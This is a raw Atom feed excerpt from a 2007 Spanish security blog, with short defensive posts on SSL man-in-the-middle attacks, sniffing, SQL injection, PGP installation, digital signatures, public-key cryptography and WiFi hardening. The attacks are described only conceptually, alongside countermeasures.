src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-9145076830075572784</id><published>2007-12-20T16:03:00.001-03:00</published><updated>2008-12-10T12:33:56.597-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Servidor Web 6</title><content type='html'>&lt;span style="font-weight: bold;"&gt;&lt;blockquote&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;SSL MiTM &lt;/span&gt;(Secure Sockets Layer)&lt;br /&gt;&lt;br /&gt; SSL es utilizado en conexiones bancarias por tradición, pero se implementa en cualquier&lt;br /&gt;esquema seguro de transferencia de información. (POP3S, IMAPS, HTTPS)&lt;br /&gt;Forma un túnel seguro, dentro del cual se pueden meter otros protocolos de red (encapsulamiento).&lt;br /&gt; SSL funciona por medio certificados públicos que envía el servidor a todos los clientes. Los clientes cifran la información que envían con dicho certificado, a su vez envían una llave criptográfica con la que el servidor podrá cifrar a la inversa. El cliente acepta el certificado basado en una firma digital emitida por una 3a. Entidad (verisign, thawte, rsa).&lt;br /&gt; La única forma de verificar que el certificado es “auténtico” es revisando dicha firma. Los navegadores realizan este chequeo de forma automática cuando usamos SSL.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;El problema:&lt;/span&gt;&lt;br /&gt;                     No todas las organizaciones recurren a las autoridades certificadoras (debido al costo, entre otras cosas).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Impacto:&lt;/span&gt;&lt;br /&gt;                     Cualquiera puede emitir certificados falsos (sin firmar por una autoridad) que&lt;br /&gt;podrían engañar a un usuario.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;El ataque:&lt;/span&gt;&lt;br /&gt;     SSL Man in The Middle&lt;br /&gt;             MiTM -&gt; chango en medio&lt;br /&gt;              1.- El atacante envía un certificado falso al usuario&lt;br /&gt;              2.- El usuario acepta el certificado falso&lt;br /&gt;              3.- El atacante inicia la comunicación con el servidor con su propia llave criptográfica&lt;br /&gt;&lt;br /&gt; Aunque se ha creado un túnel seguro, el atacante tiene acceso a él&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nams9blykQY/R2rApqWGSLI/AAAAAAAAABk/IUz2jjXjx9o/s1600-h/SYSK%2B305.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_nams9blykQY/R2rApqWGSLI/AAAAAAAAABk/IUz2jjXjx9o/s320/SYSK%2B305.jpg" alt="" id="BLOGGER_PHOTO_ID_5146137346198358194" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Solución: &lt;/span&gt;&lt;br /&gt; * Firmar los certificados con una autoridad como verisign (es costoso).&lt;br /&gt; * O al menos verificar el “fingerprint” de los certificados que recibe el navegador. (tedioso para usuarios comúnes).&lt;br /&gt; * Educar a los usuarios.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-9145076830075572784?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/9145076830075572784/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=9145076830075572784&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9145076830075572784'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9145076830075572784'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web-6.html' title='Ataques - Servidor Web 6'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nams9blykQY/R2rApqWGSLI/AAAAAAAAABk/IUz2jjXjx9o/s72-c/SYSK%2B305.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-9115804527640543296</id><published>2007-12-20T15:07:00.000-03:00</published><updated>2008-12-10T12:33:57.591-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Servidor Web 5</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nams9blykQY/R2q6_aWGSKI/AAAAAAAAABc/roH81RYPO0w/s1600-h/hacker.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 188px; height: 194px;" src="http://4.bp.blogspot.com/_nams9blykQY/R2q6_aWGSKI/AAAAAAAAABc/roH81RYPO0w/s320/hacker.jpg" alt="" id="BLOGGER_PHOTO_ID_5146131122790746274" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Sniffing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ataque pasivo enfocado a la recolección de información, esto es posible en redes que comparten el mismo medio (ethernet, campo fértil para los atacantes)&lt;br /&gt;&lt;br /&gt;Información interesante en tránsito: logins, passwords, correos, tareas, mensajero, icq, etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Solución:&lt;br /&gt;&lt;/span&gt; * Utilizar cifrado de la información (VPNs: PPtP,IPsec; SSL, GPG)&lt;br /&gt; * Utilizar switches en lugar de hubs (este mecanismo aún puede ser roto, no es&lt;br /&gt;  infalible).&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-9115804527640543296?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/9115804527640543296/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=9115804527640543296&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9115804527640543296'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/9115804527640543296'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/ataques-servidor-web-5.html' title='Ataques - Servidor Web 5'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nams9blykQY/R2q6_aWGSKI/AAAAAAAAABc/roH81RYPO0w/s72-c/hacker.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-8558023021923837962</id><published>2007-12-16T19:21:00.000-03:00</published><updated>2007-12-16T19:28:48.165-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Instalando PGP en nuestra máquina</title><content type='html'>Bueno, básicamente nos vamos a abocar en instalar PGP en nuestros sistema, para ello vamos a utilizar cualquier distribución GNU/Linux y de una conexión ADSL.&lt;br /&gt;&lt;br /&gt;Utilizando la consola o terminal de nuestro sistema, nos logeamos como root o superusuario y escribimos:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:130%;"&gt;&lt;code style="font-weight: bold;"&gt;apt-get install pgp&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;si no encontramos este paquete podemos instalar entonces pgpgpg:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;&lt;code&gt;apt-get install pgpgpg&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Con esto esperamos a que se descarguen todos los paquetes y se configuren automáticamente en nuestro sistema.&lt;br /&gt;Cabe aclarar que el entorno es en modo texto o visualizado a traves de la misma consola o terminal utilizada en la instalación, si bien contamos con entornos gráficos para esta administración como ser el caso &lt;span style="font-weight: bold;"&gt;KGpg&lt;/span&gt; entre otras, en este taller nos vamos a abocar a utilizar y aprender a utilizar en modo texto.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-8558023021923837962?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/8558023021923837962/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=8558023021923837962&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8558023021923837962'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8558023021923837962'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/instalando-pgp-en-nuestra-mquina.html' title='Instalando PGP en nuestra máquina'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-150326111374165458</id><published>2007-12-14T14:23:00.000-03:00</published><updated>2007-12-14T14:27:03.814-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>¿Que son las Firmas Digitales?</title><content type='html'>La firma digital es, en la transmisión de mensajes telemáticos y en la gestión de documentos electrónicos, un método Criptográfico que asocia la identidad de una persona o de un equipo informático al mensaje o documento. En función del tipo de firma, puede, además, asegurar la integridad del documento o mensaje.&lt;br /&gt;&lt;br /&gt;La firma electrónica o digitales, como la firma autógrafa (manuscrita), puede vincularse a un documento para identificar al autor, para señalar conformidad (o disconformidad) con el contenido, para indicar que se ha leido o, según el tipo de firma, garantizar que no se pueda modificar su contenido.&lt;br /&gt;&lt;br /&gt;PGP también ofrece autentificación de la información. Veamos por qué:&lt;br /&gt;&lt;blockquote&gt;Nuestra llave privada, además de para encriptar los mensajes, también puede ser usada para "firmar" la información enviada, de forma análoga a las firmas que realizamos a menudo sobre documentos en papel.&lt;br /&gt;Un documento que haya sido firmado digitalmente con nuestra llave privada, podrá ser autentificado por cualquiera que disponga de nuestra llave pública. Esto es útil para comprobar que el documento proviene efectivamente de quien se supone y que nadie lo ha manipulado o falsificado.&lt;br /&gt;Ambos procesos, encriptación y firma, pueden ser realizados para ofrecer privacidad y autentificación.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-150326111374165458?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/150326111374165458/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=150326111374165458&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/150326111374165458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/150326111374165458'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/que-son-las-firmas-digitales.html' title='¿Que son las Firmas Digitales?'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-8457089713973165522</id><published>2007-12-13T13:38:00.000-03:00</published><updated>2007-12-13T13:40:36.970-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Criptografía'/><title type='text'>¿Cómo funciona la criptografía de Clave pública?</title><content type='html'>En &lt;span style="font-weight: bold;"&gt;Sistemas de Clave o Llave Pública&lt;/span&gt;, cada persona tiene dos llaves que son complementarias entre sí, una es la llave pública y otra la llave privada.&lt;br /&gt;&lt;br /&gt;La Clave Pública puede y debe ser difundida libremente, ya que será con ella con la que el resto de personas podrán enviarte información de manera privada. A través de la Clave Pública no se pone en peligro la privacidad de tu Clave Privada.&lt;br /&gt;&lt;br /&gt;Supongamos un Ejemplo Daniel y Gustavos son Administradores de Seguridad Segura. Daniel podrá enviarle información de manera privada a Gustavo si conoce su Clave Pública. Por otro lado Gustavo podrá desencriptar el mensaje por medio de su propia Clave Privada.&lt;br /&gt;&lt;br /&gt;Recordemos esto:&lt;br /&gt;&lt;blockquote&gt;La seguridad del sistema se basa en que cada uno guarde su llave privada, aunque la llave pública pueda ser ampliamente conocida. Si alguien se plantease romper el sistema desconociendo la llave privada del receptor, tardaría tantos años en hacerlo que sería inútil.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-8457089713973165522?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/8457089713973165522/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=8457089713973165522&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8457089713973165522'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8457089713973165522'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/cmo-funciona-la-criptografa-de-clave.html' title='¿Cómo funciona la criptografía de Clave pública?'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7767780132256802785</id><published>2007-12-11T12:52:00.000-03:00</published><updated>2007-12-11T12:56:30.385-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Las 10 peores amenazas de seguridad para 2008</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.transmedia.cl/httpdocs/fotostrans/internetgrande.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://www.transmedia.cl/httpdocs/fotostrans/internetgrande.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;a href="http://www.theinquirer.es/2007/12/11/las_10_peores_amenazas_de_seguridad_para_2008.html"&gt;The Inquirer ES&lt;/a&gt;: La empresa de seguridad &lt;span style="font-weight: bold;"&gt;Websense&lt;/span&gt; predice la lista de amenazas que a su juicio tendrán más relevancia en el nuevo año. Entre ellas destaca el &lt;span style="font-weight: bold;"&gt;aumento de spam en la blogosfera&lt;/span&gt; para derivar tráfico a sitios infectados, &lt;span style="font-weight: bold;"&gt;ataques a las plataformas web&lt;/span&gt; aprovechando la popularidad del iPhone y la esperada actividad con motivo de los &lt;span style="font-weight: bold;"&gt;Juegos Olímpicos de Pekín.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La lista de estas amenazas la encabeza los ataques, fraudes y estafas basados en eventos como el de los juegos olímpicos del año próximo. El aumento del spam en foros, blogs, o comentarios en sitios de noticias será otro foco de actividad importante según el informe. A ellos se suman los ataques en plataformas web mediante el envío de código específico para ese sistema (Mac OSX, iPhone y Windows, principalmente), en vez de enviar ataques sólo basados en exploradores.&lt;br /&gt;&lt;br /&gt;Incrementos en ataques contra web 2.0, conversión de JavaScript para evadir antivirus, incremento de la cripto-virología y las prácticas fraudulentas con uso de protocolo de voz sobre IP (vishing) y spam de voz, son otras de las vulnerabilidades anunciadas.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7767780132256802785?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7767780132256802785/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7767780132256802785&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7767780132256802785'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7767780132256802785'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/las-10-peores-amenazas-de-seguridad.html' title='Las 10 peores amenazas de seguridad para 2008'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-406909953292144796</id><published>2007-12-11T12:41:00.000-03:00</published><updated>2007-12-11T12:44:28.638-03:00</updated><title type='text'>5 claves para proteger tu WiFi</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.greghughes.net/images/wifi.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 229px; height: 229px;" src="http://www.greghughes.net/images/wifi.jpg" alt="" border="0" /&gt;&lt;/a&gt;Si dispones de una conexión inalámbrica deberías tener en cuenta algunos consejos prácticos para tratar de proteger el acceso si no quieres que algún ‘caradura’ se aproveche de tu ancho de banda.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. Cobertura de la señal&lt;/span&gt;: es interesante limitar la fuerza de la señal WiFi para que esta sólo esté disponible a corto alcance.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. Ocultación del ESSID&lt;/span&gt;: este identificador de nuestra red WiFi (como los famosos WLAN_XX de Telefónica) puede ser ocultado para que los usuarios ‘casuales’ no vean el nombre de la red y sea más molesto el posible acceso a la misma.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Cifrado WPA&lt;/span&gt;: aunque se ha demostrado que ningún método de cifrado es completamente seguro - sobre todo el cifrado WEP, realmente pobre - el cifrado WPA/WPA2 añade mejoras que también harán algo más complicado el proceso de posible detección de claves.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4.  Cambia tu clave WiFi con frecuencia&lt;/span&gt;: si es posible, modificar la clave WiFi supondrá un seguro más para impedir el acceso a posibles intrusos.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5. Filtrado MAC&lt;/span&gt;: las direcciones MAC son identificadores únicos de cada dispositivo de red - tarjetas de red alámbricas o inalámbricas - y por tanto si activamos esta opción y listamos las direcciones MAC de nuestros dispositivos sólo ellos tendrán acceso. Un atacante tendría que averiguar las MACs ‘permitidas’ para luego poder suplantarlas, de modo que esta media aumenta un poco más el nivel de protección.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-406909953292144796?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/406909953292144796/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=406909953292144796&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/406909953292144796'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/406909953292144796'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/5-claves-para-proteger-tu-wifi.html' title='5 claves para proteger tu WiFi'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7017037140122052858</id><published>2007-12-10T14:11:00.000-03:00</published><updated>2007-12-10T14:15:14.568-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Videos sobre seguridad en ASP.NET</title><content type='html'>No quería dejar pasar esta oportunidad y mostrarle y mas que nada hacercales estos vides de Seguridad en &lt;span style="font-weight: bold;"&gt;ASP.NET&lt;/span&gt;, para aquellos programadores que lo utilizan.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/bb671347.aspx"&gt;Canonicalization&lt;/a&gt;: Explica sobre los &lt;acronym title="Access Control Lists"&gt;ACL&lt;/acronym&gt;s e &lt;em&gt;impersonación&lt;/em&gt; de usuarios para acceder a recursos, así como usar &lt;code&gt;Server.MapPath&lt;/code&gt; para limitar el acceso sólo a rutas que esten dentro del directorio virtual de una aplicación.&lt;/li&gt;&lt;li&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/bb671348.aspx"&gt;Cookies&lt;/a&gt;: Muestra como detectar la alteración de cookies.&lt;/li&gt;&lt;li&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/bb671349.aspx"&gt;Cross-Site Scripting&lt;/a&gt;: Explica que es XSS y como prevenir éstos ataques.&lt;/li&gt;&lt;li&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/bb671350.aspx"&gt;Regular Expressions&lt;/a&gt;: Explica el uso de expresiones regulares para la validación de los datos.&lt;/li&gt;&lt;li&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/bb671351.aspx"&gt;SQL Injection&lt;/a&gt;: Explica que es SQL Injection y cómo evitar este tipo de ataques usando consultas parametrizadas.&lt;/li&gt;&lt;li&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/bb671352.aspx"&gt;Validation Controls&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Fuentes &lt;a href="http://www.dragonjar.org/videos-sobre-seguridad-en-aspnet.xhtml"&gt;DragonJar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7017037140122052858?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7017037140122052858/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7017037140122052858&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7017037140122052858'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7017037140122052858'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/12/videos-sobre-seguridad-en-aspnet.html' title='Videos sobre seguridad en ASP.NET'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3699327538743151085</id><published>2007-12-09T22:45:00.000-03:00</published><updated>2008-12-10T12:33:57.864-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Ataques - Servidor Web 4</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nams9blykQY/R1yfOne7RuI/AAAAAAAAABU/7m_uuUqK_7U/s1600-h/sqlinjection.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_nams9blykQY/R1yfOne7RuI/AAAAAAAAABU/7m_uuUqK_7U/s320/sqlinjection.jpg" alt="" id="BLOGGER_PHOTO_ID_5142159948015945442" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;CGI – SQL Injection&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Consiste en manipular las consultas realizadas a sistemas que emplean bases de datos accesibles por web.&lt;br /&gt;Permite recuperar información que no ha sido autorizada e inclusive cambiarla y borrarla.&lt;br /&gt;Se ingresan caracteres especiales, de relevancia para el manejador de BD: ‘ , ;&lt;br /&gt;Muchos programadores usan javascript para filtrar estos caracteres especiales, pero... esto les parece bueno?&lt;br /&gt;Pues lamento desilucionarlos pero el atacante puede simplemente guardar el html localmente, y editarlo (removiendo el javascript). Pudiendo así finalmente introducir los caracteres especiales.&lt;br /&gt;“El navegador es territorio del enemigo” (&lt;a href="http://en.wikipedia.org/wiki/Ed_Skoudis"&gt;Ed Skoudis&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Solución:&lt;/span&gt;&lt;br /&gt;Construir aplicaciones web que no permitan la salida de caracteres extraños que pudiera introducir el usuario:&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; Comillas y apostrofes (‘, “, y ‘) como terminadores de cadena&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    * &lt;/span&gt;Punto y coma (;) – Terminador de Búsquedas&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    * &lt;/span&gt;Asterisco (*) – Selector comodin de campos&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt;*&lt;/span&gt; Guión Bajo (_) – Compara cualquier Caracter&lt;br /&gt;  * Otros Metacaracteres del Shell(&amp;amp;\|*?~&lt;&gt;[]{}$\n\r)&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
